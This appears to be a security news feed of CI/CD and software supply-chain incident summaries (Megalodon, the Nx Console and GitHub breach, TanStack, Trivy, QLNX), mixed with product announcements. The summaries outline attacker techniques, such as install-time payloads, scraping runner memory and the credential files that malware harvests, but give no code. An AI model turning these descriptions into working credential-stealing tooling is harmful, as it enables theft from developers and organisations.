All news with #ci cd security tag

🔒 CISA is addressing multiple software supply chain intrusions that target developer ecosystems, specifically CI/CD pipelines, code extensions, and workflows. A malicious Nx Console VS Code extension (version 18.95.0) exploited a prior compromise of Nx developer systems to access a GitHub employee’s device, leading to unauthorized access and exfiltration of internal repositories and assignment of CVE-2026-48027. The “Megalodon” campaign injected malicious GitHub Action workflows to harvest CI/CD secrets, cloud credentials, and tokens. CISA urges organizations to detect and remediate potential compromises and implement recommended best practices for package repositories and CI/CD security.

🔒 Researchers at SafeDep uncovered the Megalodon campaign that pushed 5,718 malicious commits into 5,561 public GitHub repositories during a six-hour window on May 18. The attackers modified GitHub Actions workflows to embed base64-encoded bash payloads designed to exfiltrate CI-exposed secrets such as cloud credentials, SSH keys, and OIDC tokens. The campaign used compromised Personal Access Tokens or deploy keys and forged author identities like build-bot to directly commit changes without PRs, and delivered two payload variants that either ran on every push or via workflow_dispatch triggers.

🚦The author argues that traditional post-hoc compliance reviews fail for AI because AI systems change continuously. Drawing on research into Chinese and EU approaches, the piece recommends embedding governance into CI/CD pipelines so model cards, data lineage and risk evaluations are generated and enforced as deployment gates. It also urges treating agent identity as first-class security control and positioning compliance as operational release infrastructure rather than a review layer.

🔔 AppLifecycle Manager Feature Flags (ALM FF) enters public preview as a rule-based service to decouple feature releases from code deployments. By using toggles and the Common Expression Language (CEL), teams can perform gradual rollouts, instant kill-switches, and percentage-based traffic ramps. String-type flags enable dynamic configuration for applications, including LLM prompts, while OpenFeature compatibility avoids vendor lock-in.

🔒 GitHub said hackers accessed approximately 3,800 internal repositories after a developer installed a malicious version of the Nx Console Visual Studio Code extension that was poisoned during last week's TanStack npm supply-chain attack. The intrusion, linked to the actor known as TeamPCP, used stolen CI/CD credentials to move into multiple projects including UiPath, Guardrails AI and OpenSearch. GitHub secured the compromised device, rotated high-impact secrets and continues log analysis and monitoring to detect follow-on activity.

🔒 GitHub confirmed an intrusion into internal repositories after an employee device was compromised by a poisoned version of the Nx Console VS Code extension published as nrwl.angular-console. The attacker, tracked as TeamPCP, exfiltrated approximately 3,800 repositories; GitHub says it rotated critical secrets and is monitoring for follow-on activity. The trojanized release was available for only 18 minutes but delivered a credential stealer targeting 1Password, Anthropic Claude Code, npm, GitHub and AWS.

🔒 Microsoft disclosed an active supply-chain attack that compromised an @antv npm maintainer account and published malicious versions of charting libraries, including echarts-for-react. The obfuscated ~499 KB JavaScript payload executes during npm install and targets GitHub Actions runners to harvest secrets from GitHub, AWS, HashiCorp Vault, npm, Kubernetes and 1Password by scraping process memory and enumerating secret stores. The campaign leverages privilege escalation, dual-channel exfiltration, and SLSA provenance forgery to evade detection; GitHub removed malicious packages and invalidated exposed tokens.

🔐 Grafana confirmed its recent data breach stemmed from a single missed GitHub workflow token that was exfiltrated after malicious TanStack npm packages executed in its CI/CD environment. The company detected the intrusion on May 1, rotated most tokens, and launched its incident response, but one token was overlooked and allowed attackers repository access. Grafana says source code wasn't altered and no customer production systems were impacted.

⏸️ Amazon Elastic Container Service (Amazon ECS) now supports configurable pause points in service deployments, allowing operators to halt progression at critical stages for manual approvals, tests, or operational checks. ECS emits Amazon EventBridge events at pause points and provides the ContinueServiceDeployment API to resume or rollback. Pause hooks support timeouts up to 14 days and configurable timeout actions. The feature integrates with native deployment strategies and is available across commercial and GovCloud Regions.

🔒 Security researchers from StepSecurity report that the popular GitHub Actions workflow actions-cool/issues-helper was hijacked by attackers who moved existing tags to imposter commits in an adversary-controlled fork. The malicious commit downloads the Bun JavaScript runtime, reads memory from the Runner.Worker process to harvest CI/CD credentials, and exfiltrates them to an attacker-controlled domain. A second action, actions-cool/maintain-one-comment, had 15 tags similarly altered. GitHub has disabled repository access and only workflows pinned to full commit SHAs remain unaffected.

🔒 Kaspersky Container Security (KCS) is presented as a comprehensive platform that reaches beyond registry image scanning to secure container workflows across development and production. The Product Security Team uses KCS in CI/CD pipelines, registry correlation, and cluster runtime monitoring to tie findings to specific artifacts, pipelines, and scan times. KCS computes risk ratings, supports SBOM processing, and produces reports in SARIF, CycloneDX, SPDX and standard formats to integrate with AppSec and internal tooling.

🚀 The Gemini CLI CI/CD extension lets developers deploy functional apps directly from a terminal, closing the gap between local prototyping and production pipelines. It performs a pre-deployment secret scan, analyzes project files, and can containerize using buildpacks before deploying to Cloud Run or Cloud Storage. For production workflows it can design CI/CD pipelines, provision resources, and generate Cloud Build YAML and triggers.

🔒 Trend Micro researchers disclosed a previously undocumented Linux implant dubbed Quasar Linux RAT (QLNX) that targets developers and DevOps credentials to establish a stealthy foothold. The fileless loader masquerades as kernel threads, erases logs, and persists via seven or more mechanisms such as systemd, crontab and .bashrc injection. Its credential harvester extracts secrets from high-value files including .npmrc, .pypirc, .git-credentials, .aws/credentials, .kube/config, .docker/config.json and .env, enabling registry poisoning, cloud access or CI/CD pivoting. QLNX also installs PAM inline-hook backdoors, a userland LD_PRELOAD rootkit and an eBPF kernel component to hide artifacts while supporting 58 remote commands and data exfiltration.

🔒 Researchers disclosed a max-severity remote code execution (RCE) vulnerability in @google/gemini-cli and the associated GitHub Action that could load untrusted workspace configurations in headless CI environments. Google issued patches in 0.39.1, 0.40.0-preview.3 and updated the run-gemini-cli Action to 0.1.22, removing implicit workspace trust and enforcing tool allowlists. Teams that pin CLI versions are advised to upgrade and review workspace configurations immediately.

🔒 Unit 42 describes a fundamental shift in the npm threat landscape following the September 2025 Shai‑Hulud worm and subsequent 2026 incidents. Adversaries now harvest npm and GitHub tokens to persist inside CI/CD pipelines, deploy dormant multi‑stage payloads, and automatically republish backdoored packages. The report attributes a broad, coordinated campaign to TeamPCP, documents propagation via Docker Hub, GitHub Actions and VS Code extensions, and recommends mitigations such as credential rotation, egress filtering, and dependency pinning.

🛡️ A malicious npm release of the Bitwarden CLI (version 2026.4.0) was briefly published after attackers compromised a GitHub Action in the project's CI/CD pipeline. The trojanized package included a loader that installs bun and executes a payload designed to harvest cloud, development, and CI credentials. Bitwarden reported no evidence of user vault access and the package was removed within roughly 1.5 hours, with compromised access revoked and remediation initiated.

🔧 Amazon has released the aws-smus-cicd-cli, an open-source command-line tool that automates deployment of multi-service data and AI applications built in SageMaker Unified Studio. Teams define applications once in an manifest.yaml, and the CLI substitutes stage-specific settings, provisions resources in dependency order, and runs post-deployment tests. Four lifecycle commands — describe, bundle, deploy, test — integrate with existing CI/CD pipelines to reduce configuration drift and speed releases. The CLI is available at no additional cost in supported Regions; you pay only for the AWS resources provisioned during deployment.

🧭 Cloudflare introduces Flagship, a native feature-flag service built on the CNCF standard OpenFeature that evaluates flags at the edge using Workers, Durable Objects, and KV. The Worker binding performs in-isolate evaluations with typed accessors and full evaluation details, avoiding external HTTP calls and reducing latency. Flagship centralizes flag storage, change auditing, percentage rollouts, and nested targeting rules, and is now available in private beta to help teams safely ship autonomous or AI-assisted code.

🔒 Recent weeks have seen multiple high-profile supply chain compromises, including malicious modifications to Axios and repository hijacks by TeamPCP that impacted tools such as Trivy. These incidents highlight how widely used libraries can rapidly propagate risk and complicate inventory and remediation efforts. The report emphasizes securing identity and CI/CD pipelines, maintaining accurate software inventories, prioritizing rapid patching, and reinforcing fundamentals like segmentation, robust logging, and multi-factor authentication to limit impact and lateral movement.

🔒 CERT‑EU traced the Europa.eu data theft to a supply‑chain compromise of Trivy, the open‑source vulnerability scanner, which exposed an AWS API key and led to the theft of approximately 350 GB of web data (91.7 GB compressed). The actor, publicly linked to TeamPCP, exploited a GitHub Actions misconfiguration (CVE-2026-33634) to force CI/CD pipelines to pull credential‑stealing malware via manipulated Trivy tags. Stolen material was later passed to ShinyHunters. CERT‑EU urges updating to safe Trivy releases, rotating cloud credentials, auditing CI/CD usage, and binding GitHub Actions to immutable SHA‑1 hashes.